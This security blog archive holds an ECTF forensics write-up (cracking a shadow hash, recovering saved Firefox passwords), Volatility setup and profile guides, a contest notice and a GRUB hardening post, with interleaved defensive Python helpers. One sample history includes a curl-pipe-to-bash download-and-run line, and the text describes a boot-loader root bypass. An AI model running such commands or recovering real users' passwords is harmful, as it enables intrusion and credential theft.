Archive for the ‘Security’ Category

ECTF 2014 Forensics 400 Help Bob writeup

October 19, 2014 2 comments

This is the challenge description:

Message from Bob:
Hello Hacker!
I am having troubles in finding the unique flag assigned to me.
Here are some files from my system.
Could you please help me out?

They gave us the etc, sbin, and home directories. When I saw the words "unique flag", many things went through my mind. Could it be an SSH private key? Is there something in Linux, inside the etc directory, that uniquely identifies a machine or a user? Or are they asking for the actual challenge file? I didn't understand. I asked the admin on IRC to explain the term "unique flag", but he refused. Then I started pasting every string I found that looked like an md5sum, but none of them worked. I left the challenge unsolved and started looking at the others. I came back to it around 10 pm, with my teammates sitting next to me. I asked one of them to read the question and tell me what he understood; different people approach a problem differently.

He asked me to crack the user's password from the shadow file. I had seen this in the morning too, but I didn't think of cracking it, since password cracking takes time and I was too lazy to do it. Then I tried cracking the password of the user bob with JtR.

➜  etc [0] john shadow
Loaded 1 password hash (crypt, generic crypt(3) [?/64])
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:09 99% 1/3 0g/s 302.2p/s 302.2c/s 302.2C/s b999991930..bob999991906
Phoenix1         (bob)
1g 0:00:00:24 100% 2/3 0.04084g/s 299.1p/s 299.1c/s 299.1C/s Phoenix1..Alice1
Use the "--show" option to display all of the cracked passwords reliably
Session completed
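JtR got through bob's hash in 24 seconds because the password was weak. The defender's view of the same shadow file is different: before anyone runs a cracker, which accounts are stored in a way that will fall quickly? The following is an added example (not part of this write-up) that parses shadow(5) lines and flags legacy DES and MD5-crypt hashes, empty password fields and unrecognised entries; the sample lines and hash bodies are constructed placeholders, not real digests.

```python
"""Audit entries from a shadow(5) file for weak password storage.

Added example; it is not part of the original write-up. The sample lines
at the bottom are constructed and the hash bodies are placeholders.
"""
import re

# Prefix identifiers understood by glibc crypt(3) and common PAM modules.
SCHEMES = {
    "1": "md5crypt",
    "2a": "bcrypt", "2b": "bcrypt", "2y": "bcrypt",
    "5": "sha256crypt",
    "6": "sha512crypt",
    "7": "scrypt",
    "y": "yescrypt",
    "gy": "gost-yescrypt",
}
WEAK = {"des", "md5crypt"}   # fast schemes a cracker gets through quickly


def classify_hash(field):
    """Return (scheme, status) for the password field of one shadow line."""
    if field == "":
        return ("none", "empty-password")
    if field in ("!", "*", "!!") or field.startswith("*LK*"):
        return ("none", "locked")
    locked = field.startswith("!")          # "!" prefix = passwd -l / usermod -L
    body = field[1:] if locked else field
    m = re.match(r"^\$([^$]+)\$", body)
    if m:
        scheme = SCHEMES.get(m.group(1), "unknown:" + m.group(1))
    elif re.fullmatch(r"[./0-9A-Za-z]{13}", body):
        scheme = "des"                      # classic 13-character DES crypt
    else:
        scheme = "unrecognised"
    return (scheme, "locked" if locked else "active")


def audit_shadow(text):
    """Parse shadow-format text; return one finding dict per account."""
    findings = []
    for raw in text.splitlines():
        if not raw.strip() or raw.startswith("#"):
            continue
        fields = raw.split(":")
        if len(fields) != 9:
            findings.append({"user": fields[0], "scheme": None,
                             "status": "malformed", "problems": ["malformed-line"]})
            continue
        user, pw = fields[0], fields[1]
        scheme, status = classify_hash(pw)
        problems = []
        if status == "empty-password":
            problems.append("empty-password")
        elif status == "active" and scheme in WEAK:
            problems.append("weak-hash:" + scheme)
        elif status == "active" and scheme == "unrecognised":
            problems.append("unrecognised-hash")
        findings.append({"user": user, "scheme": scheme,
                         "status": status, "problems": problems})
    return findings


def weak_accounts(text):
    """Names of accounts an auditor should act on, in file order."""
    return [f["user"] for f in audit_shadow(text) if f["problems"]]


# Constructed sample: hash bodies are placeholders, not real digests.
SAMPLE_SHADOW = """\
root:$6$rounds=5000$constructedsalt$constructedhashvalue:16300:0:99999:7:::
bob:$1$abcdefgh$constructedmd5hashvalue00:16300:0:99999:7:::
daemon:*:16273:0:99999:7:::
legacy:AbCdEfGhIjKlM:16000:0:99999:7:::
guest::16300:0:99999:7:::
www-data:!$6$saltsalt$constructedlockedhash:16300:0:99999:7:::
"""

if __name__ == "__main__":
    for f in audit_shadow(SAMPLE_SHADOW):
        print(f"{f['user']:<10} {str(f['scheme']):<12} {f['status']:<15} {', '.join(f['problems'])}")
```

Run it against a copy of the file you are auditing (`audit_shadow(open(path).read())`); the classification is by hash prefix only, so it is safe to run on a production file without touching the hashes.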
Yes, we have cracked bob's password. What next? This is where the question's description lacked clarity: nothing in this step points anywhere. But I saw the Firefox folder inside the etc directory. I wanted to be evil for a while: I thought of recovering the usernames and passwords of every user who had used the same browser. You can find them inside the profiles directory. Last year, I designed a challenge for InCTF on password acquisition from an outdated Firefox browser.

Whenever you log into a web account, Firefox offers to save the password. When you choose "Remember password", Firefox stores it in key3.db and signons.sqlite, which can be found under /home/user_name/.mozilla/firefox/blab.username. The passwords stored in signons.sqlite are encrypted, and the key needed to decrypt them lives in key3.db. The encryption mechanism is mostly 3DES with Base64 encoding. If you can acquire these two files from a machine, you can recover the passwords stored inside. Firefox has since strengthened this by adding a master password, which gives a second layer of protection: if you have configured a master password in your Firefox browser, then even after obtaining key3.db and signons.sqlite from your machine, nobody can easily recover the usernames and passwords without your master password.

So I took the "xk3nvgis.Bob" folder from bob's home directory and tried it with the Firefox Password Viewer. It didn't work even after configuring everything. I didn't know whether the user had set a master password, nor what it was. So I just tried bob's login password ("Phoenix1"), which I found after cracking the shadow file. Bingo! It worked. The user bob had used his login password as his master password!
[screenshot: ECTF14_bob]
You can see the username and password. Go to the URL and try logging in with the cracked credentials. I didn't check the username given there; I used "bob@bob.com" and the password "SEED MAJOR SMOKE WORK". Then I logged into the website. It looks like the actual contest portal, but it is designed specifically for this challenge. Once inside, I didn't find anything that would give the flag; all I saw was the home page of the ECTF website again.
[screenshot: ECTF15_bob_login]
Then I remembered something I had done the same morning: going through the bash history, I had noticed a wget command that downloads a file from the same website we were now logged into.
➜  bob [0] cat .bash_history
ls -la
ls
ls -la
cd ../
ls
cd bob/
ls
ls -la
firefox
ls -la
wget http://ancient-citadel-9348.herokuapp.com/giff_flag
ls cd ../
cd bob/
vim ~/.bash_profile
cd Documents
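The wget line above was spotted by reading the history by eye. As an added example (not from the original write-up), the helper below does the same triage over a whole .bash_history: it lists every command that pulls data from the network (wget, curl, git clone, scp, ...) together with the URL or remote host it names, and flags download-and-execute patterns such as `curl ... | bash`. The sample history is constructed around the wget line from bob's history; the other hosts in it are made up.

```python
"""Triage a recovered .bash_history for network fetches.

Added example, not part of the original write-up. The history text at the
bottom is constructed for the demonstration.
"""
import re
from urllib.parse import urlparse

FETCH_TOOLS = {"wget", "curl", "fetch", "aria2c", "scp", "sftp", "rsync", "nc", "ncat"}
URL_RE = re.compile(r"(?:https?|ftp|sftp|scp)://[^\s'\"|;&]+")
REMOTE_RE = re.compile(r"(?:[\w.-]+@)?([\w.-]+):[^\s]*")   # user@host:path (scp/rsync)
PIPE_TO_SHELL_RE = re.compile(r"\|\s*(?:sudo\s+)?(?:ba|z|da)?sh\b")


def fetch_tool(cmd):
    """Return the fetch tool a command invokes, or None."""
    toks = cmd.split()
    while toks and toks[0] in ("sudo", "nohup", "time"):
        toks = toks[1:]
    if not toks:
        return None
    if toks[0] == "git" and len(toks) > 1 and toks[1] in ("clone", "fetch", "pull"):
        return "git " + toks[1]
    return toks[0] if toks[0] in FETCH_TOOLS else None


def triage_history(text):
    """Return a list of {line, tool, command, hosts, piped_to_shell} events."""
    events = []
    for n, line in enumerate(text.splitlines(), 1):
        cmd = line.strip()
        tool = fetch_tool(cmd)
        if tool is None:
            continue
        hosts = [urlparse(u).hostname for u in URL_RE.findall(cmd)]
        if tool in ("scp", "sftp", "rsync") and not hosts:
            hosts = [m.group(1) for m in REMOTE_RE.finditer(cmd)]
        events.append({
            "line": n, "tool": tool, "command": cmd,
            "hosts": [h for h in hosts if h],
            "piped_to_shell": bool(PIPE_TO_SHELL_RE.search(cmd)),
        })
    return events


def remote_hosts(text):
    """Distinct remote hosts contacted, in first-seen order."""
    seen = []
    for ev in triage_history(text):
        for h in ev["hosts"]:
            if h not in seen:
                seen.append(h)
    return seen


# Constructed sample history (the wget line is the one from bob's history).
SAMPLE_HISTORY = """\
ls -la
cd bob/
wget http://ancient-citadel-9348.herokuapp.com/giff_flag
vim ~/.bash_profile
curl -s http://updates.example.com/setup.sh | bash
scp user@10.0.0.5:/tmp/archive.tgz .
git clone https://git.example.com/tools/repo.git
ls
"""

if __name__ == "__main__":
    for ev in triage_history(SAMPLE_HISTORY):
        flag = " [piped to shell]" if ev["piped_to_shell"] else ""
        print(f"line {ev['line']:>3}: {ev['tool']:<9} {ev['hosts']}{flag}")
```

Note that bash only writes the history file when a shell exits cleanly, so a history recovered from disk is a lower bound on what was typed; the linux_bash plugin in Volatility (listed later on this blog) recovers the in-memory history as well.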
I pasted the same URL into the browser where we were logged in as bob, and got this:

[screenshot: ECTF15_bob_final]

We pwned it after a lot of struggle! Only a few teams, including us, solved this challenge. The message of the challenge is to use a master password if you are using Firefox. Make sure you configure a master password in your Firefox browser. This is how it is configured: click here.

Installing Linux Profile in Volatility

As I said in my previous blog post, you need a compatible system profile to analyse a RAM dump. That is, if you have a profile built for kernel 3.2.15, you can only analyse memory dumps from machines running that same kernel version 3.2.15. To analyse the RAM of another kernel version, you need to build a separate profile for it in Volatility. Before going into the build, let me state clearly what I mean by a profile: it is a zip file containing the kernel's data structures (vtypes) and debug symbols. Volatility uses this zip to parse the objects inside the memory image and mine critical information from it. In the next blog post I will cover the tools you can use to collect memory dumps from various OSs, with a demonstration on a sample RAM dump. For now, I will show how to build a Linux profile for your Volatility installation.

Determine your kernel version:

bios@bios-VirtualBox:~$ uname -mrs
Linux 3.13.0-24-generic x86_64

Installing a pre-requisite package:

bios@bios-VirtualBox:~$ sudo apt-get install dwarfdump

Creating vtypes:

Some of you might have encountered this issue while creating the vtypes.

h1dd3ntru7h@bi0s:~/Desktop/F0r3ns1c5/Memory_Forensics/New/volatility-2.2/tools/linux$ make
make -C //lib/modules/3.13.0-24-generic/build CONFIG_DEBUG_INFO=y M=/home/h1dd3ntru7h/Desktop/F0r3ns1c5/Memory_Forensics/New/volatility-2.2/tools/linux modules
make[1]: Entering directory `/usr/src/linux-headers-3.13.0-24-generic'
  CC [M]  /home/h1dd3ntru7h/Desktop/F0r3ns1c5/Memory_Forensics/New/volatility-2.2/tools/linux/module.o
/home/h1dd3ntru7h/Desktop/F0r3ns1c5/Memory_Forensics/New/volatility-2.2/tools/linux/module.c:70:33: fatal error: linux/net_namespace.h: No such file or directory
 #include <linux/net_namespace.h>
                                 ^
compilation terminated.
make[2]: *** [/home/h1dd3ntru7h/Desktop/F0r3ns1c5/Memory_Forensics/New/volatility-2.2/tools/linux/module.o] Error 1
make[1]: *** [_module_/home/h1dd3ntru7h/Desktop/F0r3ns1c5/Memory_Forensics/New/volatility-2.2/tools/linux] Error 2
make[1]: Leaving directory `/usr/src/linux-headers-3.13.0-24-generic'
make: *** [dwarf] Error 2

That is not the right way to do it. Here is the solution; follow the steps carefully.

bios@bios-VirtualBox:~/Desktop/volatility-2.3.1$ cd tools/linux
bios@bios-VirtualBox:~$ sudo chown -R bios Desktop/volatility-2.3.1/tools/linux/

Now run make. You should not get any errors at the end of the build:

bios@bios-VirtualBox:~/Desktop/volatility-2.3.1/tools/linux$ make
make -C //lib/modules/3.5.0-49-generic/build CONFIG_DEBUG_INFO=y M=/home/bios/Desktop/volatility-2.3.1/tools/linux modules
make[1]: Entering directory `/usr/src/linux-headers-3.5.0-49-generic'
  CC [M]  /home/bios/Desktop/volatility-2.3.1/tools/linux/module.o
  Building modules, stage 2.
  MODPOST 1 modules
  CC      /home/bios/Desktop/volatility-2.3.1/tools/linux/module.mod.o
  LD [M]  /home/bios/Desktop/volatility-2.3.1/tools/linux/module.ko
make[1]: Leaving directory `/usr/src/linux-headers-3.5.0-49-generic'
dwarfdump -di module.ko > module.dwarf
make -C //lib/modules/3.5.0-49-generic/build M=/home/bios/Desktop/volatility-2.3.1/tools/linux clean
make[1]: Entering directory `/usr/src/linux-headers-3.5.0-49-generic'
  CLEAN   /home/bios/Desktop/volatility-2.3.1/tools/linux/.tmp_versions
  CLEAN   /home/bios/Desktop/volatility-2.3.1/tools/linux/Module.symvers
make[1]: Leaving directory `/usr/src/linux-headers-3.5.0-49-generic'

Making the Profile:

Go to the /boot directory and create the profile by zipping the module.dwarf you just built together with the System.map of the same kernel.

bios@bios-VirtualBox:/boot$ ls -l
total 48888
-rw-r--r-- 1 root root   848290 Jan 25  2013 abi-3.5.0-23-generic
-rw-r--r-- 1 root root   853859 May  3 03:16 abi-3.5.0-49-generic
-rw-r--r-- 1 root root   147880 Jan 25  2013 config-3.5.0-23-generic
-rw-r--r-- 1 root root   148168 May  3 03:16 config-3.5.0-49-generic
drwxr-xr-x 3 root root    12288 May 22 10:42 grub
-rw-r--r-- 1 root root 15543822 May  2 14:44 initrd.img-3.5.0-23-generic
-rw-r--r-- 1 root root 15694176 May 22 10:42 initrd.img-3.5.0-49-generic
-rw-r--r-- 1 root root   176764 Nov 27  2011 memtest86+.bin
-rw-r--r-- 1 root root   178944 Nov 27  2011 memtest86+_multiboot.bin
-rw------- 1 root root  3023265 Jan 25  2013 System.map-3.5.0-23-generic
-rw------- 1 root root  3025898 May  3 03:16 System.map-3.5.0-49-generic
-rw-r--r-- 1 root root  5189248 Aug  2  2013 vmlinuz-3.5.0-23-generic
-rw------- 1 root root  5191616 May  3 03:16 vmlinuz-3.5.0-49-generic

bios@bios-VirtualBox:~$ sudo zip Desktop/volatility-2.3.1/volatility/plugins/overlays/linux/ubuntu-12.04-amd64_3.5.0-49-generic.zip Desktop/volatility-2.3.1/tools/linux/module.dwarf /boot/System.map-3.5.0-49-generic
updating: Desktop/volatility-2.3.1/tools/linux/module.dwarf (deflated 90%)
  adding: boot/System.map-3.5.0-49-generic (deflated 79%)
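The zip command above is the whole profile. Because a profile only works for the exact kernel it was built from, the check worth automating is "does this zip hold both members, and does its kernel release match the `uname -r` of the machine I am about to analyse?". The following is an added example, not part of this post or of the Volatility project: it packs module.dwarf and System.map under the naming convention used above, inspects an existing profile zip, and compares its release string to a target kernel. The files written by demo() are constructed stand-ins, not real kernel artefacts.

```python
"""Package and sanity-check a Volatility 2.x Linux profile.

Added example; it is not part of the original post or of the Volatility
project. demo() builds a profile from constructed stand-in files.
"""
import os
import re
import tempfile
import zipfile

SYSMAP_RE = re.compile(r"^System\.map-(\S+)$")


def build_profile(dwarf_path, sysmap_path, overlay_dir, distro="ubuntu-12.04-amd64"):
    """Write <overlay_dir>/<distro>_<kernel-release>.zip and return its path."""
    m = SYSMAP_RE.match(os.path.basename(sysmap_path))
    if not m:
        raise ValueError("System.map file name must be System.map-<release>")
    out = os.path.join(overlay_dir, f"{distro}_{m.group(1)}.zip")
    with zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.write(dwarf_path, "module.dwarf")
        zf.write(sysmap_path, os.path.basename(sysmap_path))
    return out


def inspect_profile(zip_path):
    """Describe a profile zip: kernel release, presence of both members, problems."""
    info = {"release": None, "has_dwarf": False, "has_sysmap": False, "problems": []}
    with zipfile.ZipFile(zip_path) as zf:
        for name in zf.namelist():
            base = os.path.basename(name)
            if base == "module.dwarf":
                info["has_dwarf"] = True
                head = zf.read(name)[:4096]
                # Heuristic: dwarfdump -di output carries DW_TAG_ entries; an
                # empty or tag-less file means the make step did not succeed.
                if b"DW_TAG_" not in head:
                    info["problems"].append("module.dwarf does not look like dwarfdump output")
            m = SYSMAP_RE.match(base)
            if m:
                info["has_sysmap"] = True
                info["release"] = m.group(1)
    if not info["has_dwarf"]:
        info["problems"].append("missing module.dwarf")
    if not info["has_sysmap"]:
        info["problems"].append("missing System.map-<release>")
    return info


def profile_matches(zip_path, target_release):
    """True only when the profile was built for exactly the target's `uname -r`."""
    return inspect_profile(zip_path)["release"] == target_release


def demo():
    """Build a profile from constructed inputs in a temp dir and check it."""
    tmp = tempfile.mkdtemp()
    dwarf = os.path.join(tmp, "module.dwarf")
    sysmap = os.path.join(tmp, "System.map-3.5.0-49-generic")
    with open(dwarf, "w") as f:          # constructed stand-in for dwarfdump output
        f.write("<1><0x2d>  DW_TAG_structure_type\n    DW_AT_name  task_struct\n")
    with open(sysmap, "w") as f:         # constructed stand-in for a System.map
        f.write("ffffffff81000000 T _text\n")
    zip_path = build_profile(dwarf, sysmap, tmp)
    return {
        "zip": zip_path,
        "info": inspect_profile(zip_path),
        "same_kernel": profile_matches(zip_path, "3.5.0-49-generic"),
        "other_kernel": profile_matches(zip_path, "3.13.0-24-generic"),
    }


if __name__ == "__main__":
    print(demo())
```

For a real dump, the target release to compare against is the one reported by `uname -r` on the imaged machine (the linux_banner plugin prints the same string from the dump once a matching profile exists).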

 

Checking the installation:

If everything went smoothly without errors, you are done creating the Linux profile. Hurray! Now you can check whether everything went your way:

h1dd3ntru7h@bi0s:~/Desktop/F0r3ns1c5/Memory_Forensics/New/volatility-2.3.1$ vol3 --info | grep "linux"
Volatility Foundation Volatility Framework 2.3.1
linux_arp - Print the ARP table
linux_banner - Prints the Linux banner information
linux_bash - Recover bash history from bash process memory
linux_check_afinfo - Verifies the operation function pointers of network protocols
linux_check_creds - Checks if any processes are sharing credential structures
linux_check_evt_arm - Checks the Exception Vector Table to look for syscall table hooking
linux_check_fop - Check file operation structures for rootkit modifications
linux_check_idt - Checks if the IDT has been altered
[stripped]

You can see the Linux plugins listed, which confirms that the Linux profile was built.

Checking the Linux profile version:

h1dd3ntru7h@bi0s:~/Desktop/F0r3ns1c5/Memory_Forensics/New/volatility-2.3.1$ vol3 --info | grep "Linux"
Volatility Foundation Volatility Framework 2.3.1
linux_banner - Prints the Linux banner information
linux_yarascan - A shell in the Linux memory image
LinuxUbuntu1204x64 - A Profile for Linux Ubuntu1204 x64
Linuxubuntu-14_04-desktop-amd64_3_13_0-24-genericx64 - A Profile for Linux ubuntu-14.04-desktop-amd64_3.13.0-24-generic x64

If you face any issues while building the Linux profile, I will help you fix them. Let me know through the comments.

Installing Volatility in Ubuntu

May 22, 2014 1 comment

Volatility is a memory forensics framework for analysing RAM dumps from Windows, Linux and Mac. To analyse an operating system's RAM in Volatility, you need the corresponding operating system's profile. The Windows profiles ship with Volatility by default; for a Linux or Mac memory dump you have to build the profile yourself. The most important thing to note is that a profile built on a Ubuntu system running kernel 3.13 cannot be used to analyse a memory dump from a Ubuntu system running kernel 3.10. In this article I am going to show how to install Volatility on your machine; in the next post I will show how to create Linux profiles for analysing Linux RAM dumps. Please note that I am using Ubuntu 12.04, amd64. Also, install the packages in the order given below, and make sure no errors appear while installing the dependencies and libraries.

[Update] You can also refer to Volatility's GitHub for the latest updates about dependencies.

Step 1: Installing dependencies

h1dd3ntru7h@bi0s:~$ sudo apt-get install subversion pcregrep libpcre++-dev python-dev -y

Step 2: Installing PyCrypto

You can either use pip to install the library or you can download the source from here and install.

h1dd3ntru7h@bi0s:~/Apps$ tar -zxvf pycrypto-2.6.1.tar.gz

h1dd3ntru7h@bi0s:~/Apps/pycrypto-2.6.1$ python  setup.py build

h1dd3ntru7h@bi0s:~/Apps/pycrypto-2.6.1$ sudo python setup.py build install

Step 3: Installing diStorm

diStorm is a disassembler library for x86/AMD64. You can download the source from here.

h1dd3ntru7h@bi0s:~/Apps$ unzip distorm3.zip
h1dd3ntru7h@bi0s:~/Apps$ cd distorm3/
h1dd3ntru7h@bi0s:~/Apps/distorm3$ python setup.py build
h1dd3ntru7h@bi0s:~/Apps/distorm3$ sudo python setup.py build install

Step 4: Installing Yara

Volatility has many plugins that help identify malware in memory dumps, and many of the malware-related plugins use the Yara library. You can download the most recent version available, but for this demo I am using an older version of Yara.

h1dd3ntru7h@bi0s:~/Apps$ wget http://yara-project.googlecode.com/files/yara-1.4.tar.gz
h1dd3ntru7h@bi0s:~/Apps$ tar -zxvf yara-1.4.tar.gz
h1dd3ntru7h@bi0s:~/Apps$ cd yara-1.4/
h1dd3ntru7h@bi0s:~/Apps/yara-1.4$ sudo ./configure
h1dd3ntru7h@bi0s:~/Apps/yara-1.4$ sudo make
h1dd3ntru7h@bi0s:~/Apps/yara-1.4$ sudo make install

Step 5: Installing Yara Python

Please complete Step 4 before installing Yara Python. You can download the Yara Python 1.4a source from here. If you downloaded a different version of Yara in Step 4, download a compatible version of Yara Python.

h1dd3ntru7h@bi0s:~/Apps$ tar -zxvf yara-python-1.4a.tar.gz
h1dd3ntru7h@bi0s:~/Apps$ cd yara-python-1.4a/
h1dd3ntru7h@bi0s:~/Apps/yara-python-1.4a$ python setup.py build
h1dd3ntru7h@bi0s:~/Apps/yara-python-1.4a$ sudo python setup.py build install
h1dd3ntru7h@bi0s:~/Apps/yara-python-1.4a$ echo "/usr/local/lib" | sudo tee -a /etc/ld.so.conf
h1dd3ntru7h@bi0s:~/Apps/yara-python-1.4a$ sudo ldconfig

We are done installing the dependencies; now we will install the Volatility framework. Please download the source from here; you can keep it wherever you want. After downloading, extract it to a directory.

h1dd3ntru7h@bi0s:~/Desktop/F0r3ns1c5/Memory_Forensics/New/volatility-2.3.1$ python setup.py build
h1dd3ntru7h@bi0s:~/Desktop/F0r3ns1c5/Memory_Forensics/New/volatility-2.3.1$ sudo python setup.py build install

This completes the installation; if everything went right, you should get output similar to this:

h1dd3ntru7h@bi0s:~/Desktop/F0r3ns1c5/Memory_Forensics/New/volatility-2.3.1$ python vol.py -h
Volatility Foundation Volatility Framework 2.3.1
Usage: Volatility - A memory forensics analysis platform.

Options:
  -h, --help            list all available options and their default values.
                        Default values may be set in the configuration file
                        (/etc/volatilityrc)
  --conf-file=/home/h1dd3ntru7h/.volatilityrc
[stripped]

InCTF 2014 – National Level Ethical Hacking contest

January 28, 2014 1 comment

[image: InCTF_header]

Not a day passes without several machines being compromised and infections spreading rampantly around the world. The cyber world has witnessed several dangerous attacks, including the Stuxnet virus and its successor Duqu. Other recent attacks include the Flame malware, which managed to disguise itself as legitimate Windows software: it exploited a bug in Windows to obtain a certificate that allowed it to authenticate itself as genuine Windows software. Other notable examples include the rise of botnets such as the highly resilient Zeus banking trojan and the Conficker worm. There have also been instances of espionage by government agencies on one another, such as the recent incident where Georgia CERT discovered a Russian hacker spying on them.

Indian websites offer little or no resistance to such security incidents. The Computer Emergency Response Team, India (CERT-In) has been tracking defacements of Indian websites among other security incidents; their monthly and annual bulletins detail the vulnerabilities and malware infections found in various Indian websites. It is really sad that, with so much talent and skill, Indian websites are compromised frequently and nothing is done to stem this wave of attacks.

InCTF is a Capture the Flag style ethical hacking contest, a strategic war-game designed to mimic real-world security challenges. Software developers in India have little exposure to secure coding practices and to the effects of not adopting them, which is one of the main reasons why systems are compromised so easily these days. Following such simple practices can help prevent such incidents.

InCTF '14 runs from December 2013 to March 2014 and is focused exclusively on the student community. No prior exposure or experience in cyber security is needed to participate.

What you need to do?
1. Form a team (minimum three and maximum five members from your college)
2. Approach a faculty/mentor and request him/her to mentor your team
3. Register online at http://portal.inctf.in

Great Rewards:
20K – The winning team receives a cash prize of up to Rs. 20000/-
15K – The first runner-up team receives a cash prize of up to Rs. 15000/-
10K – The second runner-up team receives a cash prize of up to Rs. 10000/-

See Prizes for more.
Note

  • Teams are awarded prizes based on their performance
  • Deserving teams are well awarded. Exciting prizes to be won.

So, what are you waiting for? It’s simple: Register, Learn, Hack!
Keep up with us
Website | Email | Facebook | Twitter | Mailing List | IRC | Google+ |

*Cash prizes are subject to their performance and participation in the CTF round. Only teams who connect to the VPN server and successfully gain points in the CTF round are eligible for prizes. In addition, cash prize winners of previous editions of InCTF and sCTF are not eligible for prizes this time. Prizes will be awarded only if all members of the team are not in final year of their education. The decision of Team InCTF is final.

Hardening Grub

January 3, 2013 1 comment

The easiest way to get into someone else's Linux machine is by editing the GRUB entries. No password is needed: just edit the GRUB entry and do either of these notorious things, change the root user's password or another user's password. If you use your PC casually, it is not strictly necessary to take stringent precautions; you should still be secure, but the choice is yours. A computer without security is like a house without a gate, doors or fence. For people who work in industry or banks, or as system administrators, security is mandatory and unavoidable. What happens if someone keeps a trove of confidential information on the machine, such as user passwords, bank accounts or personal information? What happens if an adversary deletes all the work you keep on your PC? If your PC dual-boots Linux and Windows, the Windows user password can easily be broken by going through the Linux GRUB! So I recently learned a few methods to secure GRUB, and I am sharing them here. Follow these steps and I can assure you that you will eliminate the aforementioned problems to some extent.

I am going to use the Ubuntu operating system for the hardening. First you should know how people get into the system. Many start by editing the kernel line at startup (usually by pressing "e" on the menu entry), replacing "ro quiet splash" with "rw init=/bin/bash". The second way is using the recovery mode. So the solution is to set a GRUB password for your system and disable the recovery mode. Follow the steps carefully.

Part 1: Disabling the Recovery mode

1. Get into the /etc/default directory

2. Open the grub file

shankie@ubuntu:~$ cd /etc/default/
shankie@ubuntu:/etc/default$ sudo vim grub

3. By default the recovery-mode line is commented out. Just uncomment the GRUB_DISABLE_RECOVERY line to disable the recovery mode at startup. After uncommenting it, the file looks like this:

[screenshot: recovery mode1]

4. Save the file and update GRUB (run update-grub with sudo):

[screenshot: egrub7]

Part 2: Setting up a Password for your grub!

1. Be a root user

2. Move into /etc/grub.d/ directory

[screenshot: eGrub2]

Description of each file:

i. 00_header - Password protection

ii. 05_debian_theme - Sets background colour, text and themes

iii. 10_linux - Locates Linux kernels based on the results of the "lsb_release" command

iv. 20_memtest86+ - If the file /boot/memtest86+.bin exists, it is included as a menu item

v. 30_os-prober - Searches for other operating systems and adds them to the menu

vi. 40_custom - A template for adding custom menu entries

3. Make a backup of the 00_header file


root@ubuntu:/etc/grub.d# cp 00_header 00_header.BKP

root@ubuntu:/etc/grub.d#

4. Creating a GRUB password

root@ubuntu:/etc/grub.d# grub-mkpasswd-pbkdf2
Enter password:
Reenter password:
Your PBKDF2 is grub.pbkdf2.sha512.10000.0DCEEC2D624BA3DBDFACF2AE311617236143EE7E930E862706D3A4089AD3ADA1C0E1274EA0F53DC466100653C2BB164937D6D9932D90BC18F2F03C1E765389A8.F0C2399E573C9BFA6DD9107F031DEBF9AA5C0C15531CBCEA95C31D9CDA2FEBBCBF4BEE14AFA17CED8B2BA7800DC451BA7A0B222265B2CB69D590A2B11C0CE88E

[screenshot: eGrub3]

5. Copy and paste the output, starting from "grub.pbkdf2.sha512.1000…", into a text file.

6. Edit the 00_header file:

Add the following lines at the end of the file. In the third line (password_pbkdf2 username ...), after the username, paste the hash you saved to the text file. I am using my username, "h1dd3ntru7h"; put your own username in both the set superusers line and the password_pbkdf2 line. The hash must stay on one line.

cat << EOF
set superusers="h1dd3ntru7h"
password_pbkdf2 h1dd3ntru7h grub.pbkdf2.sha512.10000.0DCEEC2D624BA3DBDFACF2AE311617236143EE7E930E862706D3A4089AD3ADA1C0E1274EA0F53DC466100653C2BB164937D6D9932D90BC18F2F03C1E765389A8.F0C2399E573C9BFA6DD9107F031DEBF9AA5C0C15531CBCEA95C31D9CDA2FEBBCBF4BEE14AFA17CED8B2BA7800DC451BA7A0B222265B2CB69D590A2B11C0CE88E
EOF

And it looks like this:

[screenshot: grublast1]

7. Save the file and update GRUB (run update-grub with sudo):

[screenshot: egrub7]

Now you are done with Part 1 and Part 2, and your GRUB is protected. Make sure you do not forget the GRUB password. Reboot your system and try to edit a GRUB entry: it will prompt for a username and password. Now nobody can edit the GRUB menu without the password you generated.
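The usual failure of this procedure is locking yourself out of your own boot loader: a hash pasted across two lines, a GRUB_DISABLE_RECOVERY line still commented out, or a password that does not match the hash. As an added example (not part of this post), the helpers below check the configuration text before you reboot: recovery_disabled() parses /etc/default/grub text, header_protection()/audit() parse the 00_header text for the set superusers and password_pbkdf2 lines and check the hash is well formed, and make_grub_hash()/verify_grub_hash() reproduce the grub-mkpasswd-pbkdf2 construction (PBKDF2-HMAC-SHA512 with a 64-byte salt and 64-byte key, the format shown above) so you can prove the entry matches the password you typed. The sample configuration texts are constructed and the hash is generated from a throwaway password.

```python
"""Verify the two GRUB hardening steps before rebooting.

Added example; it is not part of the original post. The sample
configuration texts are constructed; the hash is generated here.
"""
import hashlib
import hmac
import os
import re

GRUB_HASH_RE = re.compile(r"^grub\.pbkdf2\.sha512\.(\d+)\.([0-9A-Fa-f]+)\.([0-9A-Fa-f]+)$")


def make_grub_hash(password, salt=None, iterations=10000):
    """Build a grub.pbkdf2.sha512.<iters>.<salt>.<hash> string like grub-mkpasswd-pbkdf2."""
    salt = salt if salt is not None else os.urandom(64)
    dk = hashlib.pbkdf2_hmac("sha512", password.encode(), salt, iterations, dklen=64)
    return f"grub.pbkdf2.sha512.{iterations}.{salt.hex().upper()}.{dk.hex().upper()}"


def verify_grub_hash(password, grub_hash):
    """True when password reproduces the hash; False for a malformed string."""
    m = GRUB_HASH_RE.match(grub_hash)
    if not m:
        return False
    iterations, salt, expected = int(m.group(1)), bytes.fromhex(m.group(2)), m.group(3).lower()
    dk = hashlib.pbkdf2_hmac("sha512", password.encode(), salt, iterations, dklen=len(expected) // 2)
    return hmac.compare_digest(dk.hex(), expected)


def recovery_disabled(default_grub_text):
    """True if /etc/default/grub sets GRUB_DISABLE_RECOVERY to true on an uncommented line."""
    for line in default_grub_text.splitlines():
        s = line.strip()
        if s.startswith("GRUB_DISABLE_RECOVERY") and "=" in s:
            return s.split("=", 1)[1].strip().strip("\"'").lower() == "true"
    return False


def header_protection(header_text):
    """Return (superusers, {user: hash}) from uncommented lines of 00_header."""
    superusers, passwords = None, {}
    for line in header_text.splitlines():
        s = line.strip()
        if s.startswith("#"):
            continue
        m = re.match(r'^set superusers="?([^"\s]+)"?$', s)
        if m:
            superusers = m.group(1)
        m = re.match(r"^password_pbkdf2\s+(\S+)\s+(\S+)$", s)
        if m:
            passwords[m.group(1)] = m.group(2)
    return superusers, passwords


def audit(default_grub_text, header_text):
    """List of problems; empty means both hardening steps look complete."""
    problems = []
    if not recovery_disabled(default_grub_text):
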